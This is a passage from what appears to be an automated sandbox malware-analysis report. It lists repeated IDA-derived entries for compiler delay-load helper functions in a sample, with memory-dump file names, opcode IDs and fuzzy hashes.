                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 38b94ba024b0cb83a56b9bed47de20b4dcf5773e6e02e789d6dbba7a121b1cb2
                                                                                                                                                                                • Instruction ID: dbf220564ceac714409d799a743f1c9fee76f2b87289678b505e7959024903e8
                                                                                                                                                                                • Opcode Fuzzy Hash: 38b94ba024b0cb83a56b9bed47de20b4dcf5773e6e02e789d6dbba7a121b1cb2
                                                                                                                                                                                • Instruction Fuzzy Hash: 75B092823AC202AC2608B14A5C42C3B12E8C181B1032086EAF408C1181D8841C844031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B608A7
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 532cf90bdb4fb3f6eaf9546f46c670c1ccf91cfd1333e3dcb5be59ac95930a10
                                                                                                                                                                                • Instruction ID: 9971113321ced3053b454e828b9f3e703e882ed4f8446649c27264e3029c7de6
                                                                                                                                                                                • Opcode Fuzzy Hash: 532cf90bdb4fb3f6eaf9546f46c670c1ccf91cfd1333e3dcb5be59ac95930a10
                                                                                                                                                                                • Instruction Fuzzy Hash: 19B092822EC102AC2108B14A5C42D3B12E8D181B1032085EAF408C1141D8841C400131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 44face6a6feed2198207f8e847f4e4fa6921788cad0414b9ea5382eb4112b49b
                                                                                                                                                                                • Instruction ID: 78d016c08cfc5aaa8ae8273fa2563de8911b3660c1e52e44fa04fc553635f74b
                                                                                                                                                                                • Opcode Fuzzy Hash: 44face6a6feed2198207f8e847f4e4fa6921788cad0414b9ea5382eb4112b49b
                                                                                                                                                                                • Instruction Fuzzy Hash: 03B012C73FC003BC3508318EAE02C3701CCC8C1B18730C6FAF418C00829C551C010131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 6665a020c9af5ce46227a81bbf734ee361f5540a10931394b884dc6c32658a32
                                                                                                                                                                                • Instruction ID: 5f735d72697884d12403e5b3e5878e9953c21c065e89b85afc5c776431d863aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 6665a020c9af5ce46227a81bbf734ee361f5540a10931394b884dc6c32658a32
                                                                                                                                                                                • Instruction Fuzzy Hash: 7EB012C23FC202FC334971DA9C12C3701CCD4C1B10330C6FAF408C0140D8441C410031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 37ff660716809f35c8647326eaff66bcb49ecc66812c5458ec1f78ca0d365ab9
                                                                                                                                                                                • Instruction ID: e3bbd060c10204639aaf543170918db23d8b16abe9f8a32eba41ad01398028bf
                                                                                                                                                                                • Opcode Fuzzy Hash: 37ff660716809f35c8647326eaff66bcb49ecc66812c5458ec1f78ca0d365ab9
                                                                                                                                                                                • Instruction Fuzzy Hash: F4B012C33FC102FC320971DA9C12C3701CCD4C2B10330C5FAF808C1140D8441C060031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: b49ca7d22572fdefa46d181861331b78c1202349392a985a98435e500290add3
                                                                                                                                                                                • Instruction ID: 14847ad4105d7ed5f7b7cd6abf53d360d6bb85be1f70372c44c8d561bc683ed2
                                                                                                                                                                                • Opcode Fuzzy Hash: b49ca7d22572fdefa46d181861331b78c1202349392a985a98435e500290add3
                                                                                                                                                                                • Instruction Fuzzy Hash: 01B012C33FC002EC3508718EAD02D3701DCC0C1B10330C6FAF80CC1181D8441C040131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 082eded998e6dd20844d245d24b9894d19f142c20eeb1c89d4c7fe55cb627c2b
                                                                                                                                                                                • Instruction ID: 358aa0474ed455500fdb11273113b5f861d965fb34d9dd58cd32f3a57d02fc30
                                                                                                                                                                                • Opcode Fuzzy Hash: 082eded998e6dd20844d245d24b9894d19f142c20eeb1c89d4c7fe55cb627c2b
                                                                                                                                                                                • Instruction Fuzzy Hash: CCB012C23FC102AC3608719EAD02D3B01CCC0C1B10330C7FAF40CC02C1D8451C480131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B609FC
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: c0804f586076c1bc92e2f1df45c780baee2740ef8eeae52a42674ef9f4f16392
                                                                                                                                                                                • Instruction ID: 14d84e67b11576110217b1d29fbded247b39e0c79fa5d84ced2d29ccd40272e0
                                                                                                                                                                                • Opcode Fuzzy Hash: c0804f586076c1bc92e2f1df45c780baee2740ef8eeae52a42674ef9f4f16392
                                                                                                                                                                                • Instruction Fuzzy Hash: CAB012C23FC002AC3508719EAE02D3B01CCC0C1B10330C6FAF40CC0181D8451C050131
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 6e59a47208b05e803589fba7dbfb9cd06200f64c11161d1d0e64441824c244b0
                                                                                                                                                                                • Instruction ID: ccbee8f0cafffaed4275c64c2f65280f85aad966d1ac2d39aaa136e838e7c302
                                                                                                                                                                                • Opcode Fuzzy Hash: 6e59a47208b05e803589fba7dbfb9cd06200f64c11161d1d0e64441824c244b0
                                                                                                                                                                                • Instruction Fuzzy Hash: C7B012C23FC102EC320971DA9D12D3B01CCD4C1B10330C5FAF808C0140D8451C030031
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 4ace6d385654576caf78861da268e6f8cfb007297df1f7c9467f0f305b9da291
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 4ace6d385654576caf78861da268e6f8cfb007297df1f7c9467f0f305b9da291
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: 0b5ec9d80d246e02cc7e0098b15fe5de16f566880703ce0b47aa55cf1e73a47a
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5ec9d80d246e02cc7e0098b15fe5de16f566880703ce0b47aa55cf1e73a47a
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1269201914-0
                                                                                                                                                                                • Opcode ID: ad7c633b8508e074250b66cb94d3177a8fd96ef283c03284ef29881dc21e3f53
                                                                                                                                                                                • Instruction ID: c4c05e09bb16c5c2a3c1bf8cb67b4fad1c63274c3da55e0984d9c21e07570078
                                                                                                                                                                                • Opcode Fuzzy Hash: ad7c633b8508e074250b66cb94d3177a8fd96ef283c03284ef29881dc21e3f53
                                                                                                                                                                                • Instruction Fuzzy Hash: 99A0019A2BD543BC3519B296AD56C3F02ACD6C5B65331CAFAF81AC4091A88828555435
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B6068E
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
